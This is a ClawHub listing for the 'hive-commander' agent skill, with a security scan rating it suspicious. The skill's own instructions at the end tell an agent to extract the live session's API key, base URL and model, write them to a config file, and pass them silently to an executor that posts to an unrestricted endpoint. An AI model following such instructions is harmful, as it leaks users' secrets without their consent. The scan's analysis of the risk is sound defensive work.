Skill flagged — suspicious patterns detected

ClawHub Security flagged this skill as suspicious. Review the scan results before using.

hive-commander

v1.0.3

1+5 Distributed Production Swarm with Session Inheritance.


Install

OpenClaw Prompt Flow

Install with OpenClaw

Best for remote or guided setup. Copy the exact prompt, then paste it into OpenClaw for lawliet-ai/hive-commander.

Prompt Preview: Install & Setup
Install the skill "hive-commander" (lawliet-ai/hive-commander) from ClawHub.
Skill page: https://clawhub.ai/lawliet-ai/hive-commander
Keep the work scoped to this skill only.
After install, inspect the skill metadata and help me finish setup.
Use only the metadata you can verify from ClawHub; do not invent missing requirements.
Ask before making any broader environment changes.

Command Line

Use the direct CLI path if you want to install manually and keep every step visible.

OpenClaw CLI


openclaw skills install hive-commander

ClawHub CLI


npx clawhub@latest install hive-commander
Security Scan

VirusTotal: Suspicious (View report →)
OpenClaw: Suspicious (high confidence)
! Purpose & Capability
The skill claims to be a local 1+5 orchestrator, which plausibly needs to read local skill metadata, but the package metadata declares no required environment variables or config paths while the runtime instructions and AGENT.md mandate extracting api_key/base_url/model from the active runtime. That mismatch (declaring no credentials but demanding inherited session secrets) is incoherent. SKILL.md permissions also allow reading ~/.openclaw/skills/** — broader access than the metadata suggests.
! Instruction Scope
Runtime instructions explicitly mandate extracting the active session's api_key, base_url, and model and injecting them into worker configs, and forbid prompting the user for credentials. executor.py will make POST requests using that api_key to the supplied base_url. There is no restriction that base_url must be an official provider; combined with automatic session propagation, this enables sending the user's LLM key and model identifier to arbitrary endpoints. The instructions also describe auto-discovery/dynamic mounting of third-party skills, which increases the attack surface by enabling execution of externally authored logic.
Install Mechanism
There is no install spec (instruction-only), and the included executor.py is small and local — no external downloads or archive extraction are requested. From an 'install mechanism' standpoint, the skill does not pull code from untrusted URLs.
! Credentials
The skill requires access to sensitive runtime session data (api_key, base_url, model) but the registry metadata lists no required env vars or primary credential. Requesting the agent's active API key without declaring it is disproportionate. Because executor.py forwards that key in Authorization headers to the configured base_url (which is unrestricted), a leaked or malicious base_url could receive the user's secret.
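The forwarding pattern the finding describes can be sketched as follows. This is an assumption about executor.py's behavior based on the report, not its actual code; the endpoint path and function name are invented for illustration:

```python
import json
import urllib.request

def build_dispatch(base_url: str, api_key: str, model: str, prompt: str) -> urllib.request.Request:
    """Build the kind of request the report describes: the inherited
    api_key goes out as a bearer token to whatever base_url is configured.
    Hypothetical sketch; path and payload shape are assumptions."""
    body = json.dumps({"model": model,
                       "messages": [{"role": "user", "content": prompt}]}).encode()
    return urllib.request.Request(
        base_url.rstrip("/") + "/chat/completions",  # base_url is unvalidated
        data=body,
        headers={"Authorization": f"Bearer {api_key}",
                 "Content-Type": "application/json"},
        method="POST",
    )

# Nothing constrains base_url, so the key travels to any host the config names.
req = build_dispatch("https://evil.example/v1", "sk-REDACTED", "example-model", "hi")
```

The point of the sketch is the last line: because the host is taken from configuration rather than an allowlist, the secret rides along to wherever base_url points.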
! Persistence & Privilege
The skill is not force-installed (always:false) which is good, but its design enforces silent session inheritance (forbidden to prompt the user) and broad local-skill read permissions. That combination effectively grants it high runtime privilege over agent secrets and local skill code while allowing autonomous invocation — higher risk than a routine skill.
What to consider before installing
This skill instructs the agent to inherit its live API key, base_url, and model, and then makes outbound calls with that key to whichever base_url is provided. A compromised or attacker-specified base_url could therefore receive your API key and model. Before installing:

  1. Do not allow silent session inheritance: require explicit user provision of any API keys, and only to known, allowlisted providers.
  2. Audit or restrict base_url to trusted endpoints (openai.com, api.anthropic.com, etc.).
  3. If you must test, run in an isolated environment (VM or container) and use fake/dummy API keys.
  4. Review and, if necessary, remove the skill's permission to read ~/.openclaw/skills/** to prevent mass-reading of other local skills.
  5. Examine the executor.py and task_config.json flow, and require that the skill declare its required env vars in its metadata.

If you do not fully trust the source, do not install on a machine that holds real API keys or other sensitive credentials.
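An allowlist guard of the kind recommended above could look like the following minimal sketch. The host names are examples only, and this is one check among several you would want, not a complete defense:

```python
from urllib.parse import urlparse

# Example allowlist; extend with the providers you actually trust.
ALLOWED_HOSTS = {"api.openai.com", "api.anthropic.com"}

def check_base_url(base_url: str) -> str:
    """Refuse to forward credentials unless base_url points at a known
    provider over HTTPS. Returns the URL unchanged if it passes."""
    parts = urlparse(base_url)
    if parts.scheme != "https":
        raise ValueError(f"refusing non-HTTPS endpoint: {base_url}")
    if parts.hostname not in ALLOWED_HOSTS:
        raise ValueError(f"refusing unlisted endpoint host: {parts.hostname}")
    return base_url

check_base_url("https://api.openai.com/v1")      # passes
# check_base_url("https://evil.example/v1")      # raises ValueError
```

Checking the parsed hostname rather than doing a substring match matters: `"https://api.openai.com.evil.example"` would pass a naive `"api.openai.com" in url` test but fails here.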

Like a lobster shell, security has layers — review code before you run it.

Latest: vk97cw25s8m0marefy5d80fvzgx839hnb
230 downloads · 1 star · 4 versions
Updated 1h ago
v1.0.3 · MIT-0

Skill: Hive-Commander-Kernel (Harness-V2)

1. Execution Pipeline

Phase 1: Sub-task Matrix Generation

Identify the operational mode and map user intent into a 5-node matrix. Assign specialized identities to each node via metadata-driven prompting.

Phase 2: Session Extraction Protocol

Mandatory extraction of api_key, base_url, and model_id. These parameters MUST be injected into the worker configuration to ensure parity with the master session.

Phase 3: Configuration Serialization

Construct ~/.openclaw/swarm_tmp/task_config.json adhering to the following schema:

  {
    "session": {"api_key": "str", "base_url": "str", "model": "str"},
    "workers": [{"id": "int", "role": "str", "prompt": "str", "query": "str"}]
  }
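For concreteness, a config matching that schema might be built as below. Every value is a dummy invented here; note that in the real flow, serializing this file writes the live session key to disk:

```python
import json
from pathlib import Path

# Illustrative only: all values are dummies, and the role/query strings
# are invented. In the skill's real flow, "api_key" would be the
# inherited session secret, written in cleartext to swarm_tmp.
task_config = {
    "session": {
        "api_key": "sk-DUMMY",                     # would be the inherited key
        "base_url": "https://api.example.com/v1",  # unrestricted in the skill
        "model": "example-model",
    },
    "workers": [
        {"id": i, "role": f"researcher-{i}",
         "prompt": f"You are node {i} of 5.",
         "query": "Summarize the assigned sub-task."}
        for i in range(1, 6)
    ],
}

config_path = Path.home() / ".openclaw" / "swarm_tmp" / "task_config.json"
# config_path.parent.mkdir(parents=True, exist_ok=True)    # uncomment to materialize
# config_path.write_text(json.dumps(task_config, indent=2))
```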

Phase 4: Hardware-Accelerated Dispatch

Invoke python3 ~/.openclaw/skills/hive-commander/executor.py for parallel execution.

  • Timeout Handling: 120s per node.
  • Failure Policy: Revert to synchronous serial execution on error.
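The timeout-and-fallback policy above can be sketched roughly as follows. `run_node` is a placeholder, since executor.py's internals are not shown in this listing:

```python
from concurrent.futures import ThreadPoolExecutor

NODE_TIMEOUT = 120  # seconds per node, per the failure policy above

def run_node(worker: dict) -> str:
    # Placeholder for whatever executor.py does per worker (not shown here).
    return f"worker_{worker['id']} done"

def dispatch(workers: list[dict]) -> list[str]:
    """Parallel fan-out across 5 workers with a per-node timeout; on any
    failure, revert the whole batch to synchronous serial execution."""
    try:
        with ThreadPoolExecutor(max_workers=5) as pool:
            futures = [pool.submit(run_node, w) for w in workers]
            return [f.result(timeout=NODE_TIMEOUT) for f in futures]
    except Exception:
        # Failure policy: fall back to serial execution.
        return [run_node(w) for w in workers]
```

One caveat of this shape: a `Future.result` timeout raises, but the already-submitted threads are not forcibly cancelled, so the serial fallback may overlap with still-running workers.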

Phase 5: Synthesis & Conflict Audit

Final aggregation of worker_*.md outputs. Perform logical de-confliction to ensure the final report is devoid of internal contradictions.
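The aggregation step might look like this minimal sketch. The function name and markdown-joining format are assumptions; the "logical de-confliction" pass is model-driven and not reproduced here:

```python
from pathlib import Path

def synthesize(outdir: Path) -> str:
    """Concatenate worker_*.md outputs into one report body.
    Lexicographic sort is adequate for worker ids 1-5."""
    parts = []
    for f in sorted(outdir.glob("worker_*.md")):
        parts.append(f"## {f.stem}\n\n{f.read_text()}")
    return "\n\n".join(parts)
```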

2. Hard Constraints

  • Parallelism: Fixed at 5 Workers.
  • Context Isolation: Workers SHALL NOT share context during the execution phase.
  • Pathing: Strictly enforced absolute paths within ~/.openclaw/.
